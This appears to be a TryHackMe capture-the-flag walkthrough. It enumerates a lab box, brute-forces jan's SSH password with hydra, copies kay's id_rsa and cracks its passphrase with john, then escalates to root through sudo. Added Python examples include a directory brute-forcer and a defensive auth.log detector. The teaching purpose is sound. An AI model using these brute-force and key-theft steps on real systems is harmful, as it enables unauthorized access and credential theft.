2020-11-01 23:33:29 +05:00

TryHackMe-Basic Pentesting

Abdullah Rizwan | 07:04 PM | 1st November, 2020

NMAP


Nmap scan report for 10.10.207.136                                        
Host is up (0.17s latency).                                                                                                                         
Not shown: 994 closed ports          
PORT     STATE SERVICE     VERSION                                                                                                                  
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                                                                                                      
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)                                                                                      
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)                                                                                     
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)                                                                                   
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))                                                                                           
|_http-server-header: Apache/2.4.18 (Ubuntu)                                                                                                        
|_http-title: Site doesn't have a title (text/html).                                                                                                
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)                                                                              
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 
8009/tcp open  ajp13?                                                                                                                               
| ajp-methods:                                                                                                                                      
|_  Supported methods: GET HEAD POST OPTIONS                                                                                                        
8080/tcp open  http-proxy                                                                                                                           
| fingerprint-strings:                                                                                                                              
|   ms-sql-s, oracle-tns:                                                                                                                           
|     HTTP/1.1 400                                                                                                                                  
|     Content-Type: text/html;charset=utf-8                                                                                                         
|     Content-Language: en                                                                                                                          
|     Content-Length: 2243                                                                                                                          
|     Date: Sun, 01 Nov 2020 14:11:05 GMT                                                                                                           
|     Connection: close                                                                                                                             
|_    <!doctype html><html lang="en"><head><title>HTTP Status 400 – Bad Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.80%I=7%D=11/1%Time=5F9EC1F9%P=x86_64-pc-linux-gnu%r(or
[rest of the SF fingerprint omitted: it is the same Tomcat "HTTP Status 400 – Bad Request" page already shown under fingerprint-strings above, returned for the oracle-tns and ms-sql-s probes]
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                                               
                                     
Host script results:                                                                                                                                
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s                                                                                       
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:                                                                                                                                 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)                                                                                                           
|   Computer name: basic2                                                                                                                           
|   NetBIOS computer name: BASIC2\x00                                                                                                               
|   Domain name: \x00                                                                                                                               
|   FQDN: basic2                                                                                                                                    
|_  System time: 2020-11-01T09:11:08-05:00                                                                                                          
| smb-security-mode:                                                                                                                                
|   account_used: guest                                                                                                                             
|   authentication_level: user                                                                                                                      
|   challenge_response: supported                                                                                                                   
|_  message_signing: disabled (dangerous, but default)                                                                                              
| smb2-security-mode:                                                                                                                               
|   2.02:                                                                                                                                           
|_    Message signing enabled but not required                                                                                                      
| smb2-time:                                                                                                                                        
|   date: 2020-11-01T14:11:08                                                                                                                       
|_  start_date: N/A                                                                                                                                 
                                                                                                                                                    
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.02 seconds                                               

PORT 80

PORT 8080

SMB Shares

Ports 139 and 445 are open, so let's see whether we can access the Samba shares. Nmap's smb-security-mode output above already shows it got in with account_used: guest, so anonymous access is worth trying first.

From the staff.txt we just grabbed off the share, we can find two usernames: jan and kay.

Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)

-Kay

Gobuster

Running gobuster against the web server on port 80 finds a directory, /development. The 301 is Apache redirecting /development to /development/, which is what a real directory looks like to a brute-forcer; the two notes that follow, j.txt and dev.txt, came from there.

gobuster dir -u http://10.10.207.136/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.207.136/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/11/01 19:18:49 Starting gobuster
===============================================================
/development (Status: 301)
Progress: 3698 / 220561 (1.68%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/11/01 19:20:02 Finished
===============================================================
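Added example (not from the writeup and not gobuster's code): a minimal directory brute-forcer that does what the run above does, with the HTTP layer injectable so the hit logic can be exercised offline. The target URL, wordlist path and User-Agent string are placeholders. The point worth seeing in code is that redirects must not be followed: the 301 on /development is the finding, and a client that chases it to /development/ would report a 200 (or a 403 if indexes are off) and lose the signal.

```python
"""
Directory brute force in the style of the gobuster run above, with the
HTTP layer injectable so the hit logic can be exercised offline.

Added example, not part of the original writeup and not gobuster's code.
The target URL, wordlist path and User-Agent are assumptions.
"""
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Set, Tuple

# The same default status codes gobuster 3.0.1 treats as hits (see its banner above).
INTERESTING: Set[int] = {200, 204, 301, 302, 307, 401, 403}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects: a 301 on /development IS the finding."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None   # makes urllib raise HTTPError(301) instead of following


def http_status(url: str, timeout: float = 10.0) -> int:
    """Return the status code for url without following redirects."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": "dirbust/0.1"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code      # 301, 403, 404 ... all land here carrying the real code


def brute_dirs(base_url: str, words: Iterable[str],
               fetch: Callable[[str], int] = http_status,
               interesting: Set[int] = INTERESTING) -> List[Tuple[str, int]]:
    """Request base_url/<word> for every word; return (path, status) for hits."""
    base = base_url.rstrip("/")
    hits: List[Tuple[str, int]] = []
    for word in words:
        word = word.strip()
        if not word or word.startswith("#"):    # dirbuster lists carry comment lines
            continue
        status = fetch(f"{base}/{word}")
        if status in interesting:
            hits.append((f"/{word}", status))
    return hits


def load_wordlist(path: str) -> List[str]:
    with open(path, encoding="utf-8", errors="ignore") as fh:
        return fh.read().splitlines()


if __name__ == "__main__":
    # Live run against the room's target (needs network; the paths are placeholders).
    words = load_wordlist("/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt")
    for path, status in brute_dirs("http://10.10.207.136/", words):
        print(f"{path} (Status: {status})")
```

With a real target the output line format matches gobuster's ("/development (Status: 301)"); the next step is to request /development/ directly, since Apache directory indexes, when enabled, list the files inside.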

j.txt

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

dev.txt


2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

Hydra

The note for J says jan's password was cracked easily, so jan is the account to go after. SSH is open on the box, so let's brute-force jan's SSH login with hydra and rockyou. Note hydra's own warning below: sshd limits parallel sessions, and -t 4 is the safer setting (this run left the default of 16).

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.207.136 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-01 19:27:32
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.207.136:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344223 to do in 1358:22h, 16 active
 
[STATUS] 112.00 tries/min, 336 tries in 00:03h, 14344063 to do in 2134:32h, 16 active
[22][ssh] host: 10.10.207.136   login: jan   password: armando
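Added example (not from the writeup): the same hydra run seen from the defender's side. OpenSSH logs every attempt to /var/log/auth.log, and a burst of "Failed password" lines from one source followed by an "Accepted password" from the same source is the whole story of the attack above in a handful of lines. The log lines below are constructed to mimic OpenSSH 7.2 syslog output; the attacker address 10.9.1.5, the second source 10.9.2.7, the host name basic2 and the threshold and window values are assumptions.

```python
"""
Spot an SSH password brute force in auth.log and flag the success that ends it.

Added example, not part of the original writeup. SAMPLE_AUTH_LOG is constructed
(OpenSSH-style syslog lines); the IPs, host name and thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

SAMPLE_AUTH_LOG = """\
Nov  1 14:27:32 basic2 sshd[1412]: Failed password for jan from 10.9.1.5 port 50122 ssh2
Nov  1 14:27:32 basic2 sshd[1414]: Failed password for jan from 10.9.1.5 port 50124 ssh2
Nov  1 14:27:33 basic2 sshd[1416]: Failed password for jan from 10.9.1.5 port 50126 ssh2
Nov  1 14:27:33 basic2 sshd[1418]: Failed password for invalid user admin from 10.9.1.5 port 50128 ssh2
Nov  1 14:27:34 basic2 sshd[1420]: Failed password for jan from 10.9.1.5 port 50130 ssh2
Nov  1 14:27:35 basic2 sshd[1422]: Failed password for jan from 10.9.1.5 port 50132 ssh2
Nov  1 14:27:40 basic2 sshd[1430]: Accepted password for jan from 10.9.1.5 port 50140 ssh2
Nov  1 14:30:01 basic2 CRON[1500]: pam_unix(cron:session): session opened for user root by (uid=0)
Nov  1 14:31:10 basic2 sshd[1510]: Failed password for kay from 10.9.2.7 port 40001 ssh2
Nov  1 14:35:00 basic2 sshd[1520]: Accepted publickey for kay from 10.9.2.7 port 40002 ssh2: RSA SHA256:abc
"""

# One regex covers both outcomes and both auth methods; "invalid user" is optional.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_ts(ts: str, year: int = 2020) -> datetime:
    # syslog timestamps carry no year; assume one so they can be compared.
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(log_text: str, threshold: int = 5,
                      window: timedelta = timedelta(minutes=1)) -> List[Dict[str, object]]:
    """One alert per source IP that produced >= threshold failures inside `window`.

    Each alert also lists users who then logged in *by password* from that IP
    after the burst began: that is the signature of a successful guess.
    """
    failures: Dict[str, List[datetime]] = defaultdict(list)
    successes: Dict[str, list] = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        when = parse_ts(m["ts"])
        if m["result"] == "Failed":
            failures[m["ip"]].append(when)
        else:
            successes[m["ip"]].append((when, m["user"], m["method"]))

    alerts = []
    for ip, times in failures.items():
        times.sort()
        # sliding window: does any run of `threshold` consecutive failures fit in `window`?
        burst = next((times[i] for i in range(len(times) - threshold + 1)
                      if times[i + threshold - 1] - times[i] <= window), None)
        if burst is None:
            continue
        compromised = {u for (t, u, meth) in successes[ip]
                       if t >= burst and meth == "password"}
        alerts.append({"ip": ip, "failures": len(times),
                       "burst_start": burst.isoformat(),
                       "compromised_users": sorted(compromised)})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The key-based login from 10.9.2.7 is deliberately not counted as a compromise: a public-key "Accepted" after a single failure is normal traffic, and keying on the password method is what separates a guessed credential from a legitimate user.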

The ETA hydra prints (well over a thousand hours) is for the whole 14-million-line list; jan's password sits early enough in rockyou to fall long before that.

Log in as jan and look around. Kay's home directory is readable, including /home/kay/.ssh/id_rsa, the private key that would let us log in as kay. Copy it back to the attacking machine (netcat works: listen on one side and cat the file into the connection on the other).

But we still cannot log in with it: the id_rsa is passphrase-protected.

Use ssh2john to turn the key into a hash that john can crack:

root@kali:~/TryHackMe/Easy/BasicPentesting# /usr/share/john/ssh2john.py id_rsa  > hash_for_id_rsa

Now run john against hash_for_id_rsa. With no wordlist given, john first tries its default password.lst and then falls into incremental mode (the 3/3 in the status lines), and the passphrase only drops after about thirteen minutes. beeswax is in rockyou.txt, so pointing john at it with --wordlist=/usr/share/wordlists/rockyou.txt would have been much quicker:

Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
0g 0:00:00:56  3/3 0g/s 2748Kp/s 2748Kc/s 2748KC/s pigr3sr..pigr0ts
0g 0:00:00:57  3/3 0g/s 2760Kp/s 2760Kc/s 2760KC/s jalyoun..jalyof4
0g 0:00:00:58  3/3 0g/s 2772Kp/s 2772Kc/s 2772KC/s 1llgod..1llgu1
0g 0:00:05:23  3/3 0g/s 2294Kp/s 2294Kc/s 2294KC/s fcp0luf..fcp0l46
0g 0:00:05:24  3/3 0g/s 2297Kp/s 2297Kc/s 2297KC/s nadah76..nadahro
0g 0:00:06:36  3/3 0g/s 2351Kp/s 2351Kc/s 2351KC/s gaudlsd..gaudsk3
0g 0:00:07:21  3/3 0g/s 2381Kp/s 2381Kc/s 2381KC/s civlup42..civl12mt
0g 0:00:07:22  3/3 0g/s 2384Kp/s 2384Kc/s 2384KC/s adiskak2..adiskuas
0g 0:00:09:14  3/3 0g/s 2527Kp/s 2527Kc/s 2527KC/s cornsexice..cornsexto1
0g 0:00:09:15  3/3 0g/s 2528Kp/s 2528Kc/s 2528KC/s cujkdc1..cujkdd4
0g 0:00:09:16  3/3 0g/s 2530Kp/s 2530Kc/s 2530KC/s bslhmf6..bslhm82
0g 0:00:09:17  3/3 0g/s 2532Kp/s 2532Kc/s 2532KC/s psyctiu..psyct29
0g 0:00:09:18  3/3 0g/s 2534Kp/s 2534Kc/s 2534KC/s tr00ge1..tr00gak
0g 0:00:09:19  3/3 0g/s 2536Kp/s 2536Kc/s 2536KC/s kmdufs1..kmduf6q
0g 0:00:12:52  3/3 0g/s 2458Kp/s 2458Kc/s 2458KC/s ecicos7..ecicots
0g 0:00:12:53  3/3 0g/s 2460Kp/s 2460Kc/s 2460KC/s eussce7..eussc14
0g 0:00:12:54  3/3 0g/s 2461Kp/s 2461Kc/s 2461KC/s exxza8f..exxzay!
0g 0:00:12:55  3/3 0g/s 2463Kp/s 2463Kc/s 2463KC/s eevzco5..eevzcuk
0g 0:00:12:56  3/3 0g/s 2464Kp/s 2464Kc/s 2464KC/s ublhl..ublni
0g 0:00:12:57  3/3 0g/s 2466Kp/s 2466Kc/s 2466KC/s 0zjnhb..0zjnd4
0g 0:00:12:58  3/3 0g/s 2467Kp/s 2467Kc/s 2467KC/s l4zb3n..l4zpay
0g 0:00:12:59  3/3 0g/s 2469Kp/s 2469Kc/s 2469KC/s hfu71s..hfu706
0g 0:00:13:01  3/3 0g/s 2471Kp/s 2471Kc/s 2471KC/s 4s18le..4s18cw
0g 0:00:13:02  3/3 0g/s 2473Kp/s 2473Kc/s 2473KC/s mcjau03..mcjau25
0g 0:00:13:03  3/3 0g/s 2474Kp/s 2474Kc/s 2474KC/s cim0cno..cim0c11
beeswax          (id_rsa)
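Added example (not from the writeup and not ssh2john's code): before handing a stolen key to john it is worth knowing what you are up against, which is exactly the header information ssh2john extracts. OpenSSH 7.2, as on this box, writes keys in the legacy PEM layout, where Proc-Type: 4,ENCRYPTED and a DEK-Info line name the cipher and IV and the passphrase is stretched with a single MD5 pass; that is why john gets millions of candidates per second above. Keys written in the newer openssh-key-v1 layout (ssh-keygen -o, the default since OpenSSH 7.8) use the bcrypt KDF with a round count, and crack orders of magnitude slower. The parser below handles both layouts using only the standard library. The two sample keys are constructed with dummy key material, not kay's real id_rsa; the cipher names and round count in the samples are assumptions.

```python
"""
Report whether an OpenSSH private key is passphrase-protected, and with what,
before handing it to ssh2john/john. Handles the legacy PEM layout (Proc-Type /
DEK-Info headers) and the newer "openssh-key-v1" layout.

Added example, not part of the original writeup or of ssh2john. The samples
are constructed: valid structure, dummy key material, not kay's real id_rsa.
"""
import base64
import struct
from typing import Dict, Tuple

# Constructed sample: what OpenSSH 7.2's ssh-keygen writes for a passphrased key.
LEGACY_ENCRYPTED_PEM = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(b: bytes) -> bytes:
    """SSH wire encoding: big-endian uint32 length, then the bytes."""
    return struct.pack(">I", len(b)) + b


def _read_string(buf: bytes, off: int) -> Tuple[bytes, int]:
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def build_openssh_v1(cipher: bytes, kdf: bytes, rounds: int = 16) -> str:
    """Construct a structurally valid openssh-key-v1 key with dummy payloads."""
    if kdf == b"bcrypt":
        kdfoptions = _ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)  # salt, rounds
    else:
        kdfoptions = b""
    body = (b"openssh-key-v1\x00"
            + _ssh_string(cipher) + _ssh_string(kdf) + _ssh_string(kdfoptions)
            + struct.pack(">I", 1)              # number of keys
            + _ssh_string(b"\x00" * 32)         # public key blob (dummy)
            + _ssh_string(b"\x00" * 64))        # (encrypted) private section (dummy)
    b64 = base64.b64encode(body).decode()
    lines = [b64[i:i + 70] for i in range(0, len(b64), 70)]
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + "\n".join(lines)
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


def inspect_private_key(pem: str) -> Dict[str, object]:
    """Parse just enough of the key to say how (and whether) it is protected."""
    lines = [ln.strip() for ln in pem.strip().splitlines()]
    if len(lines) < 2 or not lines[0].startswith("-----BEGIN ") or not lines[-1].startswith("-----END "):
        raise ValueError("not a PEM-style private key")
    label = lines[0][len("-----BEGIN "):-len("-----")]
    body = lines[1:-1]

    if label == "OPENSSH PRIVATE KEY":
        blob = base64.b64decode("".join(body))
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("bad openssh-key-v1 magic")
        cipher, off = _read_string(blob, len(magic))
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        info: Dict[str, object] = {"format": "openssh-key-v1", "encrypted": cipher != b"none",
                                   "cipher": cipher.decode(), "kdf": kdf.decode()}
        if kdf == b"bcrypt":
            salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack_from(">I", kdfopts, o)
            info.update(salt_len=len(salt), rounds=rounds)   # rounds drive cracking cost
        return info

    # Legacy PEM: optional RFC 1421 headers, a blank line, then base64 body.
    headers: Dict[str, str] = {}
    for ln in body:
        if not ln:
            break
        if ":" in ln:
            k, v = ln.split(":", 1)
            headers[k.strip()] = v.strip()
    encrypted = headers.get("Proc-Type", "").endswith("ENCRYPTED")
    info = {"format": "legacy-pem", "key_type": label, "encrypted": encrypted}
    if encrypted and "DEK-Info" in headers:
        cipher, iv_hex = headers["DEK-Info"].split(",", 1)
        info.update(cipher=cipher, iv_len=len(bytes.fromhex(iv_hex)))
    return info


if __name__ == "__main__":
    print(inspect_private_key(LEGACY_ENCRYPTED_PEM))
    print(inspect_private_key(build_openssh_v1(b"aes256-ctr", b"bcrypt", rounds=24)))
    print(inspect_private_key(build_openssh_v1(b"none", b"none")))
```

For a legacy key the answer is "run rockyou, it will be fast"; for a bcrypt-KDF key with a high round count, a targeted wordlist matters far more than raw speed. The same parser also catches the case where the key is not encrypted at all, in which case ssh2john is unnecessary and ssh -i works immediately.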

After logging in as kay with the key and the cracked passphrase, checking sudo -l shows kay may run ALL commands as root:

Matching Defaults entries for kay on basic2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kay may run the following commands on basic2:
    (ALL : ALL) ALL
kay@basic2:~$ 

So sudo bash gives a root shell. Note that the rule carries no NOPASSWD tag, so sudo will prompt for kay's own password here.